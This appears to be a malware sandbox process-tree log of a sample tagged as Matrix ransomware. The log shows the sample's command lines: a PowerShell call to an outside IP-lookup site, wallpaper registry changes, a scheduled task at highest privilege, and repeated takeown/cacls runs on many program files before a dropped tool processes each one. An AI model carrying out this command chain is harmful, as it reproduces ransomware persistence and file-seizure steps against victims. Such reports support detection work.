PID 2028 wrote to memory of 1648	2028	wscript.exe	cmd.exe
PID 1648 wrote to memory of 832	1648	cmd.exe	schtasks.exe
PID 1648 wrote to memory of 832	1648	cmd.exe	schtasks.exe
PID 1648 wrote to memory of 832	1648	cmd.exe	schtasks.exe
PID 1648 wrote to memory of 832	1648	cmd.exe	schtasks.exe
PID 1700 wrote to memory of 876	1700	taskeng.exe	cmd.exe
PID 1700 wrote to memory of 876	1700	taskeng.exe	cmd.exe
PID 1700 wrote to memory of 876	1700	taskeng.exe	cmd.exe
PID 1184 wrote to memory of 1000	1184	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	cmd.exe
PID 1184 wrote to memory of 1000	1184	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	cmd.exe
PID 1184 wrote to memory of 1000	1184	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	cmd.exe
PID 1184 wrote to memory of 1000	1184	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe	cmd.exe
PID 1000 wrote to memory of 1332	1000	cmd.exe	cacls.exe

C:\Users\Admin\AppData\Local\Temp\67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
"C:\Users\Admin\AppData\Local\Temp\67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe"
1⤵
- Matrix Ransomware
- Loads dropped DLL
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1184
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe" "C:\Users\Admin\AppData\Local\Temp\NWRDmPHs.exe"
  2⤵
  PID:1392
- C:\Users\Admin\AppData\Local\Temp\NWRDmPHs.exe
  "C:\Users\Admin\AppData\Local\Temp\NWRDmPHs.exe" -n
  2⤵
  - Executes dropped EXE
  PID:1336
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\MFbqqQWL.txt"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:568
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1948
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\77XyyPCo.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1720
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\77XyyPCo.bmp" /f
    3⤵
    - Sets desktop wallpaper using registry
    PID:1528
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
    3⤵
    PID:1508
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
    3⤵
    PID:1280
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\9vfvDlEt.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:688
- - C:\Windows\SysWOW64\wscript.exe
    wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\9vfvDlEt.vbs"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2028
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\FykVrmhV.bat" /sc minute /mo 5 /RL HIGHEST /F
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1708
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\FykVrmhV.bat" /sc minute /mo 5 /RL HIGHEST /F
        5⤵
        Creates scheduled task(s)
        
        PID:768
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1648
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Run /I /tn DSHCA
        5⤵
        
        PID:832
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1000
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf" /E /G Admin:F /C
    3⤵
    PID:1332
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf"
    3⤵
    PID:952
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "StandardBusiness.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:768
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "StandardBusiness.pdf" -nobanner
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1372
    - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV64.exe
        
        b3EHwRvV.exe -accepteula "StandardBusiness.pdf" -nobanner
        5⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Sets service image path in registry
        Enumerates connected drives
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: LoadsDriver
        Suspicious use of AdjustPrivilegeToken
        
        PID:1556
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa""
  2⤵
  - Loads dropped DLL
  PID:1116
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa" /E /G Admin:F /C
    3⤵
    PID:1524
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa"
    3⤵
    PID:1624
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "classes.jsa" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1580
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "classes.jsa" -nobanner
      4⤵
      Executes dropped EXE
      PID:1304
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:468
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files\Windows Journal\en-US\jnwmon.dll.mui""
  2⤵
  - Loads dropped DLL
  PID:1068
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\en-US\jnwmon.dll.mui" /E /G Admin:F /C
    3⤵
    PID:968
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\en-US\jnwmon.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1580
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "jnwmon.dll.mui" -nobanner
    3⤵
    - Loads dropped DLL
    PID:808
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "jnwmon.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:1824
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2028
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files\Windows Journal\es-ES\NBMapTIP.dll.mui""
  2⤵
  - Loads dropped DLL
  PID:1304
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\es-ES\NBMapTIP.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1724
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\es-ES\NBMapTIP.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:468
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "NBMapTIP.dll.mui" -nobanner
    3⤵
    - Loads dropped DLL
    PID:996
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "NBMapTIP.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:1608
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1600
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files\Windows Journal\it-IT\jnwdui.dll.mui""
  2⤵
  - Loads dropped DLL
  PID:1724
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\it-IT\jnwdui.dll.mui" /E /G Admin:F /C
    3⤵
    PID:2004
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\it-IT\jnwdui.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1608
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "jnwdui.dll.mui" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1580
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "jnwdui.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:968
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1476
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files\Windows Journal\ja-JP\MSPVWCTL.DLL.mui""
  2⤵
  - Loads dropped DLL
  PID:1896
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\ja-JP\MSPVWCTL.DLL.mui" /E /G Admin:F /C
    3⤵
    PID:604
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\ja-JP\MSPVWCTL.DLL.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1948
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner
    3⤵
    - Loads dropped DLL
    PID:468
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:1048
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2004
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files\Windows Journal\Templates\Memo.jtp""
  2⤵
  - Loads dropped DLL
  PID:1100
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\Templates\Memo.jtp" /E /G Admin:F /C
    3⤵
    PID:1724
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\Templates\Memo.jtp"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1048
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "Memo.jtp" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1116
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "Memo.jtp" -nobanner
      4⤵
      Executes dropped EXE
      PID:568
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:996
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files\Windows Mail\es-ES\msoeres.dll.mui""
  2⤵
  - Loads dropped DLL
  PID:1608
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\es-ES\msoeres.dll.mui" /E /G Admin:F /C
    3⤵
    PID:992
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\es-ES\msoeres.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1116
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "msoeres.dll.mui" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1256
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "msoeres.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:996
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1048
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files\Windows Mail\WinMail.exe""
  2⤵
  - Loads dropped DLL
  PID:968
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\WinMail.exe" /E /G Admin:F /C
    3⤵
    PID:1820
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\WinMail.exe"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:568
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "WinMail.exe" -nobanner
    3⤵
    - Loads dropped DLL
    PID:992
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "WinMail.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:1048
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1304
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui""
  2⤵
  - Loads dropped DLL
  PID:1600
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:1896
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:992
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1820
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:1100
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1896
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf""
  2⤵
  - Loads dropped DLL
  PID:604
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf" /E /G Admin:F /C
    3⤵
    PID:1256
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf"
    3⤵
    PID:1724
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "ENUtxt.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:2028
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "ENUtxt.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:568
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:992
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png""
  2⤵
  - Loads dropped DLL
  PID:1100
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png" /E /G Admin:F /C
    3⤵
    PID:1948
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:604
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "MahjongMCE.png" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1048
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "MahjongMCE.png" -nobanner
      4⤵
      Executes dropped EXE
      PID:1896
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:604
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der""
  2⤵
  - Loads dropped DLL
  PID:1896
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der" /E /G Admin:F /C
    3⤵
    PID:1256
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der"
    3⤵
    PID:1608
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "RTC.der" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1100
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "RTC.der" -nobanner
      4⤵
      Executes dropped EXE
      PID:2028
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:604
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif""
  2⤵
  - Loads dropped DLL
  PID:1724
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif" /E /G Admin:F /C
    3⤵
    PID:604
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif"
    3⤵
    PID:888
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "end_review.gif" -nobanner
    3⤵
    - Loads dropped DLL
    PID:968
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "end_review.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:1948
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2028
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif""
  2⤵
  - Loads dropped DLL
  PID:1048
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif" /E /G Admin:F /C
    3⤵
    PID:888
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif"
    3⤵
    PID:1724
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "reviews_joined.gif" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1256
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "reviews_joined.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:1100
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1724
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif""
  2⤵
  - Loads dropped DLL
  PID:1256
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif" /E /G Admin:F /C
    3⤵
    PID:604
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif"
    3⤵
    PID:2028
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "server_ok.gif" -nobanner
    3⤵
    - Loads dropped DLL
    PID:888
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "server_ok.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:604
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1896
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif""
  2⤵
  - Loads dropped DLL
  PID:888
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif" /E /G Admin:F /C
    3⤵
    PID:1524
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif"
    3⤵
    PID:1048
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "warning.gif" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1600
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "warning.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:1524
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1896
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf""
  2⤵
  - Loads dropped DLL
  PID:1524
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf" /E /G Admin:F /C
    3⤵
    PID:1256
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf"
    3⤵
    PID:1600
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "MinionPro-It.otf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1048
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "MinionPro-It.otf" -nobanner
      4⤵
      Executes dropped EXE
      PID:888
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2060
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB""
  2⤵
  - Loads dropped DLL
  PID:2076
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB" /E /G Admin:F /C
    3⤵
    PID:2100
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB"
    3⤵
    PID:2112
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "ZX______.PFB" -nobanner
    3⤵
    - Loads dropped DLL
    PID:2120
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "ZX______.PFB" -nobanner
      4⤵
      Executes dropped EXE
      PID:2128
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2144
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp""
  2⤵
  - Loads dropped DLL
  PID:2164
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp" /E /G Admin:F /C
    3⤵
    PID:2188
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp"
    3⤵
    PID:2200
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "brt04.hsp" -nobanner
    3⤵
    - Loads dropped DLL
    PID:2208
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "brt04.hsp" -nobanner
      4⤵
      Executes dropped EXE
      PID:2216
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2232
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env""
  2⤵
  - Loads dropped DLL
  PID:2252
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env" /E /G Admin:F /C
    3⤵
    PID:2276
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env"
    3⤵
    PID:2288
